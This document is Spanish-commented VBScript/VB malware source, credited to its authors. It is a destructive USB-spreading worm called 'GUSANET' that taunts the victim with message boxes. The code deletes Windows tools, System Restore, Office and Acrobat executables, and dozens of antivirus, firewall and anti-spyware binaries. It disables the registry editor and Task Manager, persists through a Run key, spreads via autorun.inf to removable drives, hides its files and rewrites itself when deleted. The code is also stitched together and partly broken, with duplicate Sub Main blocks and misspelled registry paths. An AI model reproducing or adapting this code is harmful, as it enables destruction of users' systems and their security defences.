'@echo off by Eliphas & Nehekara. Añoranza del Valhalla.
'por la gloria del Larisel IV, ahora y siempre
'Especiales agradecimientos a Octalh y a Hendrix
App.Taskvisible = False
MsgBox "Por fin nos hemos encontrado tú y yo.", vbExclamation, "Cherubael dice:"
MsgBox "Sabrías que vendría y he venido.", vbExclamation, "Cherubael dice:"
MsgBox "Nehekara no perdona los agravios recibidos.", vbExclamation, "Cherubael dice:"
MsgBox "A sí que ahora afronta las consecuencias.", vbExclamation, "Cherubael dice:"
MsgBox "Quod Erat Demostrandum...", vbExclamation, "Cherubael dice:"
MsgBox "Todas las almas claman por su salvación.", vbExclamation, "Cherubael dice:"
MsgBox "DAME EL PaWeRrR!!!", vbCritical, "Cherubael dice:"
Sub Main()
On Error Resume Next
If Month(Now) = 12 And Day(Now) = 17 Then
MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
End Sub
Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlogon.exe d/ C:\WINDOWS\System\winlogon.exe" 'el pequeñín ya está en el registro
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
Kill "C:\WINDOWS\System32\shutdown.exe"
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"
Sub Main() 'Dejando nuestra marca
On Error Resume Next
Set Cherubael = CreateObject("WScript.Shell")
Cherubael.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.CherubaeL.com.ar"
Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"
Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"
End Sub
Sub Main()
On Error Resume Next
Randomize
Num = Rnd
If Num = 0 Then
MsgBox "A pesar de todo, voy a apiadarme de tí. SOnríe, eres libre.", vbExclamation, "Cherubael dice:"
End If
If Num = 1 Then
MsgBox "Lo siento, pero debo cumplir mis órdenes. Hoy la suerte te ha abandonado.", vbExclamation, "Cherubael dice:"
Kill "C:\WINDOWS\System32\taskmgr.exe"
Kill "C:\WINDOWS\Taskman.EXE"
Kill "C:\WINDOWS\System32\cmd.exe"
Kill "C:\WINDOWS\regedit.exe"
Kill "C:\WINDOWS\System32\wscui.cpl"
Kill "C:\WINDOWS\System32\command.com"
Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE" 'hala!! a tomar por culo el office...
Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
End If
End Sub
'[ MODELO DE OBJETOS ]
Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS
Set WshShell = wscript.CreateObject("WScript.Shell") ' REGISTRO
'[ CONSTANTES ]
GUSANETname = wscript.ScriptName ' Indicamos que el nombre del GUSANET sera
' el que tenga en ese momento el archivo actual.
GUSANET = "GUSANET.vbs"
'Nombre del exe que tendra el GUSANET en el sistema
GUSANETpatch = fso.GetSpecialFolder(1) & "\" & GUSANET
'Indicamos el directorio donde se copiara el GUSANET, si utilizamos
'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1)
'sin importar donde se encuentre.
autorun = fso.GetSpecialFolder(1) & "\autorun.txt"
'lo mismo que en GUSANETpatch pero para el autorrun.
GUSANETusb = ":\proyecto.exe" ' Nombre que tendra el GUSANET en el medio extraible
autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible
Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante
'[ CHEQUEO DE INFECCION ]
If Not infeccion(GUSANET) Then
copiar GUSANETname, GUSANETpatch
End If
' + INFECTAR REGISTRO DE WINDOWS +
If Not keyexist("GUSANET", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\") Then
crearentradareg()
'Si no existe la llave en el registro llamada GUSANET entonces la crea, con esto aseguramos
'el arranque del GUSANET con cada inicio del sistema.
'Subproceso que se encarga crear un archivo y escribir datos en el
'en este caso le indicamos que cree un archivo con la constante autorun
'que definimos desde el principio
Sub makeautorun()
On Error Resume Next
Set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de
mkaut.WriteLine "[AUTORUN]" 'la constante autorun
mkaut.WriteLine "open=" & GUSANETusb 'constante del nombre del ejecutable.
mkaut.WriteLine "shell\1=abrir"
mkaut.WriteLine "shell\1\Command=" & GUSANETusb
mkaut.WriteLine "shell\2\=explorar"
mkaut.WriteLine "shell\2\Command=" & GUSANETusb
mkaut.WriteLine "shellexecute=" & GUSANETusb
mkaut.Close
End Sub
'aqui creamos el autorun que sirve para ejecutar el GUSANET cuando el pardillo haga doble click
'en el icono de la unidad extraible
'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura
'a cada archivo que compone al GUSANET
Sub makeatributos()
On Error Resume Next
Dim archivosGUSANET(1) 'array archivosGUSANET que dentro de el contiene al GUSANET y su autorun
archivosGUSANET(0) = GUSANETpatch
archivosGUSANET(1) = autorun
For Each file In archivosGUSANET ' por cada archivo dentro del array archivosGUSANET
Set wormcontent = fso.GetFile(file) 'tomalos y
wormcontent.Attributes = 7 'agregales atributos
Next
End Sub
'Funcion que se encarga de verificar que exista una llave en el registro
Function keyexist(keyname, keyPath, regCategory)
On Error Resume Next
retVal = False
strComputer = "." 'inicamos en cualquier computadora
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv") 'se crea un objeto
oReg.EnumKey regCategory, keyPath, arrSubKeys 'partes de la clave del registro
For Each subkey In arrSubKeys
If keyname = subkey Then
retVal = True
Exit For
End If
Next
keyExists = retVal
End Function
'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos
'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista
'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra
'llave a verficar
'Subproceso que se encarga de crear la llave en el registro
Private Sub crearentradareg()
On Error Resume Next
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GUSANET", _
GUSANETpatch, "REG_SZ"
End Sub
'Subproceso que se encarga de copiar al GUSANET a una unidad extraible.
Private Sub infekusb()
On Error Resume Next
Const DriveTypeRemovable = 1 ' indicamos medio extraible
Do ' inicia loop infinito
Set oFS = wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los drivers
For Each Drive In oDrives 'por cada driver
If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
If fso.fileexists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
Set cFile = fso.GetFile(Drive.DriveLetter + autorunusb) 'tomalo y
cFile.Attributes = 0 ' quitale los atributos
fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True 'despues copialo
Else ' de lo contrario
fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True ' copialo
End If
fso.CopyFile GUSANETpatch, Drive.DriveLetter & GUSANETusb, True ' copia el GUSANET a la unidad
End If
End If
Next
Loop
End Sub
Sub Main()
On Error Resume Next
Kill "C:\Archivos de programa\ESET\nod32.exe"
Kill "C:\Archivos de programa\ESET\nod32kui.exe"
Kill "C:\Archivos de programa\ESET\nod32krn.exe"
Kill "C:\Archivos de programa\ESET\nod32krr.dll"
Kill "C:\Archivos de programa\ESET\nod32ari.dll"
Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
Kill "C:\Archivos de programa\AntiVir\avscan.exe"
Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
Kill "C:\Archivos de programa\AntiVir\avguard.exe"
Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
Kill "C:\Archivos de programa\ATS2\ats.exe"
Kill "C:\Archivos de programa\ATS2\d1.exe"
Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"
End Sub
Function Antidelete()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function